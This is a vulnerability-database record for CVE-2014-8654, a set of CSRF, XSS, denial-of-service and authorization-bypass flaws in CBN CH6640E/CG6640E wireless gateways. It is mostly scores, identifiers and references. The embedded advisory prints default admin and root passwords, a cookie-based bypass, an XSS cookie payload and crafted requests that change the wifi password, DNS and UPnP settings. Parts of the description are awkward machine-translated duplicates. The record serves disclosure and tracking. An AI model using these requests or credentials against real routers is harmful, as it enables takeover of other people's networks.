Sign-up

ID

VAR-201411-0177


CVE

CVE-2014-8654


TITLE

Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Cross-site request forgery vulnerability in hardware firmware

Trust: 0.8

sources: JVNDB: JVNDB-2014-005241

DESCRIPTION

Multiple cross-site request forgery (CSRF) vulnerabilities in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway hardware 1.0 with firmware CH6640-3.5.11.7-NOSH allow remote attackers to hijack the authentication of administrators for requests that (1) have unspecified impact on DDNS configuration via a request to basicDDNS.html, (2) change the wifi password via the psKey parameter to setWirelessSecurity.html, (3) add a static MAC address via the MacAddress parameter in an add_static action to setBasicDHCP1.html, or (4) enable or disable UPnP via the UPnP parameter in an apply action to setAdvancedOptions.html. (2) setWirelessSecurity.html of psKey Via parameters wifi The password is changed. (3) setBasicDHCP1.html of add_static In action MacAddress Static via parameters MAC An address is added. (4) setAdvancedOptions.html of apply Of UPnP Via parameters UPnP Is enabled or disabled. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Ch664oe Wireless Gateway is prone to a cross-site request forgery vulnerability. The 'UPnP' parameter in the apply action of the html page exploits this vulnerability to enable or disable UPnP. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0 Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway. Default credentials: admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information. Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5203 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php 04.10.2014 --- Authorization Bypass Information Disclosure Vulnerability ######################################################### http://192.168.0.1/xml/CmgwWirelessSecurity.xml http://192.168.0.1/xml/DocsisConfigFile.xml http://192.168.0.1/xml/CmgwBasicSetup.xml http://192.168.0.1/basicDDNS.html http://192.168.0.1/basicLanUsers.html http://192.168.0.1:5000/rootDesc.xml Set cookie: userData to root or admin, reveals additional pages/info. -- <html> <body> <script> document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; </script> </body> </html> -- Denial of Service (DoS) for all WiFi connected clients (disconnect) ################################################################### GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1 Stored Cross-Site Scripting (XSS) Vulnerability ############################################### Cookie: userData Value: hax0r"><script>alert(document.cookie);</script> -- <html> <body> <script> document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/"; </script> </body> </html> -- Cross-Site Request Forgery (CSRF) Vulnerability ############################################### DDNS config: ------------ GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1 Change wifi pass: ----------------- GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1 Add static mac address (static assigned dhcp client): ----------------------------------------------------- GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1 Enable/Disable UPnP: -------------------- GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)

Trust: 2.7

sources: NVD: CVE-2014-8654 // JVNDB: JVNDB-2014-005241 // CNVD: CNVD-2014-07893 // BID: 77760 // ZSL: ZSL-2014-5203 // VULHUB: VHN-76599 // PACKETSTORM: 128860

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2014-07893

AFFECTED PRODUCTS

vendor:compal broadbandmodel:cg6640e wireless gatewayscope:eqversion:1.0

Trust: 1.8

vendor:compal broadbandmodel: - scope:eqversion:ch6640-3.5.11.7-nosh

Trust: 1.6

vendor:compal broadbandmodel:ch664oe wireless gatewayscope:eqversion:1.0

Trust: 1.0

vendor:compal broadbandmodel:ch6640e wireless gatewayscope:eqversion:1.0

Trust: 0.8

vendor:compal broadbandmodel:networksscope:eqversion:ch6640-3.5.11.7-nosh

Trust: 0.8

vendor:compalmodel:broadband networks inc cg6640e wireless gatewayscope:eqversion:1.0

Trust: 0.6

vendor:compalmodel:broadband networks inc ch6640e wireless gatewayscope:eqversion:1.0

Trust: 0.6

vendor:compalmodel:broadband networks ch6640-3.5.11.7-noshscope: - version: -

Trust: 0.3

vendor:compalmodel:broadband networks ch664oe wireless gatewayscope:eqversion:1.0

Trust: 0.3

vendor:compalmodel:broadband networks cg6640e wireless gatewayscope:eqversion:1.0

Trust: 0.3

vendor:compal broadband cbnmodel:chscope:eqversion:model: ch6640 and ch6640e

Trust: 0.1

vendor:compal broadband cbnmodel:chscope:eqversion:hardware version: 1.0

Trust: 0.1

vendor:compal broadband cbnmodel:chscope:eqversion:firmware version: ch6640-3.5.11.7-nosh

Trust: 0.1

vendor:compal broadband cbnmodel:chscope:eqversion:boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01

Trust: 0.1

vendor:compal broadband cbnmodel:chscope:eqversion:docsis mode: docsis 3.0

Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // BID: 77760 // JVNDB: JVNDB-2014-005241 // CNNVD: CNNVD-201411-189 // NVD: CVE-2014-8654

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-8654
value: MEDIUM

Trust: 1.0

NVD: CVE-2014-8654
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2014-07893
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201411-189
value: MEDIUM

Trust: 0.6

ZSL: ZSL-2014-5203
value: (3/5)

Trust: 0.1

VULHUB: VHN-76599
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2014-8654
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2014-07893
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-76599
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // VULHUB: VHN-76599 // JVNDB: JVNDB-2014-005241 // CNNVD: CNNVD-201411-189 // NVD: CVE-2014-8654

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.9

sources: VULHUB: VHN-76599 // JVNDB: JVNDB-2014-005241 // NVD: CVE-2014-8654

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201411-189

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-201411-189

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2014-005241

EXPLOIT AVAILABILITY
sources:
            
            
            ZSL: ZSL-2014-5203 // 
            
            
            
            VULHUB: VHN-76599

PATCH
title:Top Pageurl:http://www.icbn.com.tw/
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2014-005241

EXTERNAL IDS
db:NVDid:CVE-2014-8654
Trust: 3.5
db:EXPLOIT-DBid:35075
Trust: 2.9
db:BIDid:70762
Trust: 2.7
db:ZSLid:ZSL-2014-5203
Trust: 2.5
db:PACKETSTORMid:128860
Trust: 1.9
db:OSVDBid:113843
Trust: 1.8
db:OSVDBid:113842
Trust: 1.8
db:OSVDBid:113841
Trust: 1.8
db:OSVDBid:113840
Trust: 1.8
db:XFid:98329
Trust: 1.0
db:JVNDBid:JVNDB-2014-005241
Trust: 0.8
db:CNNVDid:CNNVD-201411-189
Trust: 0.7
db:CNVDid:CNVD-2014-07893
Trust: 0.6
db:BIDid:77760
Trust: 0.4
db:XFid:98328
Trust: 0.1
db:OSVDBid:113838
Trust: 0.1
db:OSVDBid:113836
Trust: 0.1
db:OSVDBid:113837
Trust: 0.1
db:OSVDBid:113839
Trust: 0.1
db:CXSECURITYid:WLB-2014100162
Trust: 0.1
db:VULHUBid:VHN-76599
Trust: 0.1
sources:
            
            
            ZSL: ZSL-2014-5203 // 
            
            
            
            CNVD: CNVD-2014-07893 // 
            
            
            
            VULHUB: VHN-76599 // 
            
            
            
            BID: 77760 // 
            
            
            
            JVNDB: JVNDB-2014-005241 // 
            
            
            
            PACKETSTORM: 128860 // 
            
            
            
            CNNVD: CNNVD-201411-189 // 
            
            
            
            NVD: CVE-2014-8654

REFERENCES
url:http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php
Trust: 2.4
url:http://www.securityfocus.com/bid/70762
Trust: 2.1
url:http://www.exploit-db.com/exploits/35075
Trust: 2.0
url:http://osvdb.org/show/osvdb/113840
Trust: 1.8
url:http://osvdb.org/show/osvdb/113841
Trust: 1.8
url:http://osvdb.org/show/osvdb/113842
Trust: 1.8
url:http://osvdb.org/show/osvdb/113843
Trust: 1.8
url:http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html
Trust: 1.7
url:https://exchange.xforce.ibmcloud.com/vulnerabilities/98329
Trust: 1.1
url:http://xforce.iss.net/xforce/xfdb/98329
Trust: 1.0
url:http://www.exploit-db.com/exploits/35075/
Trust: 0.9
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654
Trust: 0.9
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8654
Trust: 0.8
url:http://cxsecurity.com/issue/wlb-2014100162
Trust: 0.1
url:http://osvdb.org/show/osvdb/113836
Trust: 0.1
url:http://osvdb.org/show/osvdb/113837
Trust: 0.1
url:http://osvdb.org/show/osvdb/113838
Trust: 0.1
url:http://osvdb.org/show/osvdb/113839
Trust: 0.1
url:http://packetstormsecurity.com/files/128860
Trust: 0.1
url:http://xforce.iss.net/xforce/xfdb/98328
Trust: 0.1
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653
Trust: 0.1
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654
Trust: 0.1
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655
Trust: 0.1
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656
Trust: 0.1
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657
Trust: 0.1
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653
Trust: 0.1
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655
Trust: 0.1
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656
Trust: 0.1
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657
Trust: 0.1
url:http://192.168.0.1/basiclanusers.html
Trust: 0.1
url:http://192.168.0.1/xml/docsisconfigfile.xml
Trust: 0.1
url:http://192.168.0.1/xml/cmgwbasicsetup.xml
Trust: 0.1
url:http://192.168.0.1/setwirelesssecurity.html?ssid=0&smode=7&sbmode=1&encalgm=3&pskey=new_password&rekeyint=0
Trust: 0.1
url:http://192.168.0.1:5000/rootdesc.xml
Trust: 0.1
url:http://192.168.0.1/basicddns.html
Trust: 0.1
url:http://192.168.0.1/setadvancedoptions.html?action=apply&instance=undefined&upnp=1
Trust: 0.1
url:http://192.168.0.1/xml/cmgwwirelesssecurity.xml
Trust: 0.1
url:http://192.168.0.1/wirelesschannelstatus.html
Trust: 0.1
url:http://192.168.0.1/setbasicdhcp1.html?action=add_static&macaddress=38%3a59%3af9%3ac3%3ae3%3aef&leasedip=8
Trust: 0.1
url:http://www.icbn.com.tw
Trust: 0.1
url:http://192.168.0.1/basicddns.html?ddnsservice=1&ddnsusername=a&ddnspassword=b&ddnshostname=c#
Trust: 0.1
url:http://192.168.0.1/setadvancedoptions.html?action=apply&instance=undefined&upnp=2
Trust: 0.1
sources:
            
            
            ZSL: ZSL-2014-5203 // 
            
            
            
            CNVD: CNVD-2014-07893 // 
            
            
            
            VULHUB: VHN-76599 // 
            
            
            
            BID: 77760 // 
            
            
            
            JVNDB: JVNDB-2014-005241 // 
            
            
            
            PACKETSTORM: 128860 // 
            
            
            
            CNNVD: CNNVD-201411-189 // 
            
            
            
            NVD: CVE-2014-8654

CREDITS
Unknown
Trust: 0.3
sources:
            
            
            BID: 77760

SOURCES
db:ZSLid:ZSL-2014-5203
db:CNVDid:CNVD-2014-07893
db:VULHUBid:VHN-76599
db:BIDid:77760
db:JVNDBid:JVNDB-2014-005241
db:PACKETSTORMid:128860
db:CNNVDid:CNNVD-201411-189
db:NVDid:CVE-2014-8654

LAST UPDATE DATE
2025-04-13T23:14:41.528000+00:00

SOURCES UPDATE DATE
db:ZSLid:ZSL-2014-5203date:2014-11-07T00:00:00
db:CNVDid:CNVD-2014-07893date:2014-11-10T00:00:00
db:VULHUBid:VHN-76599date:2017-09-08T00:00:00
db:BIDid:77760date:2014-11-06T00:00:00
db:JVNDBid:JVNDB-2014-005241date:2014-11-07T00:00:00
db:CNNVDid:CNNVD-201411-189date:2014-11-14T00:00:00
db:NVDid:CVE-2014-8654date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE
db:ZSLid:ZSL-2014-5203date:2014-10-25T00:00:00
db:CNVDid:CNVD-2014-07893date:2014-11-04T00:00:00
db:VULHUBid:VHN-76599date:2014-11-06T00:00:00
db:BIDid:77760date:2014-11-06T00:00:00
db:JVNDBid:JVNDB-2014-005241date:2014-11-07T00:00:00
db:PACKETSTORMid:128860date:2014-10-28T00:59:24
db:CNNVDid:CNNVD-201411-189date:2014-11-14T00:00:00
db:NVDid:CVE-2014-8654date:2014-11-06T15:55:10.803